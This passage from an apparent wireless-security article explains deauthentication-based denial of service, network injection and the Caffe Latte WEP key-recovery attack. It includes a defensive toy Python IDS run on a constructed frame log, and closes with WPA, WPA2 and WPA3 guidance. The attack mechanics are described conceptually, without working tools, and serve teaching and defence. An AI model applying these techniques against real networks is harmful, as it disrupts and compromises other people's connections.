A denial-of-service (DoS) attack occurs when an attacker continually bombards a targeted AP (Access Point) or network with bogus requests, premature successful-connection messages, failure messages, or other commands. Legitimate users cannot get on the network, and the infrastructure may even crash. Such attacks abuse protocols like the Extensible Authentication Protocol (EAP), but the simplest lever is the 802.11 management plane: deauthentication and disassociation frames were unauthenticated in the original standard, so a single forged frame disconnects a client. 802.11w Protected Management Frames (PMF), optional in WPA2 and mandatory in WPA3, removes that lever; radio-level jamming, by contrast, cannot be fixed by protocol changes.
Network injection
In a network injection attack, a cracker can make use of access points that are exposed to non-filtered network traffic, specifically broadcasting network traffic such as “Spanning Tree” (802.1D), OSPF, RIP, and HSRP. The cracker injects bogus networking re-configuration commands that affect routers, switches, and intelligent hubs. A whole network can be brought down in this manner and require rebooting or even reprogramming of all intelligent networking devices.
Caffe Latte attack
The Caffe Latte attack is another way to defeat WEP, and the attacker does not need to be anywhere near the target network. It targets a client (originally via the Windows wireless stack) that still has a WEP profile cached: the attacker's rogue AP advertises that SSID, the client connects and sends encrypted ARP traffic, and the attacker, exploiting the shared-key authentication and message-modification flaws of 802.11 WEP, replays modified ARP requests so that the client produces a flood of encrypted ARP responses. From those responses the WEP key is recovered with standard statistical attacks in less than 6 minutes.
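Three of the attacks in this section (the evil twin / soft AP, the deauthentication flood used for denial of service and man-in-the-middle, and MAC spoofing) leave traces that a wireless IDS can spot in monitor-mode captures. The toy detector below is an added example, not code from the original page: it runs three checks over a constructed frame log, built inside the block, whose record layout and the `KNOWN_APS` inventory are assumptions rather than the output of any real tool.

```python
"""Toy wireless IDS: three detections over a constructed 802.11 frame log (added example)."""
from collections import defaultdict

# Record layout (assumed, constructed): (time_s, frame_type, source_mac, bssid, ssid, seq_num)
KNOWN_APS = {"CorpWiFi": {"00:11:22:33:44:55"}}   # assumed inventory: SSID -> authorised BSSIDs
AP = "00:11:22:33:44:55"
CLIENT = "aa:bb:cc:dd:ee:01"


def build_sample_frames():
    """Constructed capture: normal traffic, then an evil twin, a deauth flood, a MAC spoof."""
    f = []
    for i in range(20):                                   # beacons plus one client's data frames
        f.append((i * 0.1, "beacon", AP, AP, "CorpWiFi", i))
        f.append((i * 0.1 + 0.05, "data", CLIENT, AP, "", 100 + i))
    f.append((2.0, "beacon", "de:ad:be:ef:00:01", "de:ad:be:ef:00:01", "CorpWiFi", 0))  # evil twin
    for i in range(30):                                   # 30 deauths in 0.3 s, forged as the real AP
        f.append((2.1 + i * 0.01, "deauth", AP, AP, "", i))
    for i in range(3):                                    # attacker reusing CLIENT's MAC, own counter
        f.append((2.5 + i * 0.02, "data", CLIENT, AP, "", 3000 + i))
        f.append((2.51 + i * 0.02, "data", CLIENT, AP, "", 120 + i))
    return sorted(f, key=lambda r: r[0])


def detect_evil_twin(frames, known_aps):
    """A known SSID advertised by a BSSID that is not in the inventory."""
    alerts, seen = [], set()
    for t, ftype, src, bssid, ssid, seq in frames:
        if ftype == "beacon" and ssid in known_aps and bssid not in known_aps[ssid] and bssid not in seen:
            seen.add(bssid)
            alerts.append((t, "evil-twin", ssid, bssid))
    return alerts


def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """At least `threshold` deauth frames from one BSSID inside a sliding time window."""
    times = defaultdict(list)
    for t, ftype, src, bssid, ssid, seq in frames:
        if ftype == "deauth":
            times[bssid].append(t)
    alerts = []
    for bssid, ts in times.items():
        start = 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append((ts[end], "deauth-flood", bssid, end - start + 1))
                break
    return alerts


def detect_mac_spoof(frames, max_gap=50):
    """12-bit 802.11 sequence numbers rise by one per frame from a station; a second radio using
    the same MAC shows up as backward or large forward jumps. A production detector must first
    discard retransmissions (same seq, Retry bit set), which this toy log does not contain."""
    last, alerts = {}, []
    for t, ftype, src, bssid, ssid, seq in frames:
        if ftype != "data":
            continue
        if src in last:
            delta = (seq - last[src]) % 4096
            if delta == 0 or delta > max_gap:
                alerts.append((t, "mac-spoof", src, last[src], seq))
        last[src] = seq
    return alerts


def run_all(frames, known_aps=KNOWN_APS):
    alerts = detect_evil_twin(frames, known_aps) + detect_deauth_flood(frames) + detect_mac_spoof(frames)
    return sorted(alerts, key=lambda a: a[0])


FRAMES = build_sample_frames()

if __name__ == "__main__":
    for alert in run_all(FRAMES):
        print(alert)
```

The first forty records (the clean traffic) raise nothing; the evil twin fires on the first foreign beacon, the flood fires once the tenth deauth lands inside the window, and the spoof fires on the jump from sequence number 119 to 3000. The same three signals are what commercial WIDS sensors key on, with the addition of signal-strength fingerprinting that is not reproducible from a log alone.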
Which Wi-Fi protected access is the best?
WPA (with TKIP) is now obsolete and leaves a wireless network open to known attacks. If you have a router or access point that supports only WPA, replace it with a newer device that supports WPA2 or, preferably, WPA3.
WPA2 replaced WPA in 2004 and is still the most widely deployed protocol, including in the enterprise. While far safer than WPA, WPA2 implementations were shown in 2017 to be vulnerable to key reinstallation attacks (KRACK), in which an attacker in radio range replays four-way-handshake messages to force nonce reuse and can then decrypt or inject traffic. Vendors fixed it with client and access-point patches, so unpatched devices remain exposed.
WPA3 raises the baseline with SAE, mandatory Protected Management Frames and forward secrecy, and is generally considered by experts to be the most secure option. Note that KRACK was a handshake flaw closed by patching rather than by the new protocol version, and WPA3 implementations have had flaws of their own, so even WPA3 is not impervious. Mitigate them with regular firmware and operating-system updates.
Keep in mind that wireless hardware manufacturers often ship products with the security settings turned off or left at defaults. Make sure that you set the device up properly before using it.
Conclusion
Wireless networking provides numerous opportunities to increase productivity and cut costs. It also alters an organization's overall computer security risk profile. Although it is impossible to eliminate all risks associated with wireless networking, it is possible to achieve a reasonable level of overall security by adopting a systematic approach to assessing and managing risk. This article discussed the threats and vulnerabilities associated with each of the three basic technology components of wireless networks (clients, access points, and the transmission medium) and described commonly available countermeasures that can be used to mitigate those risks. It also stressed the importance of training and educating users in safe wireless networking procedures.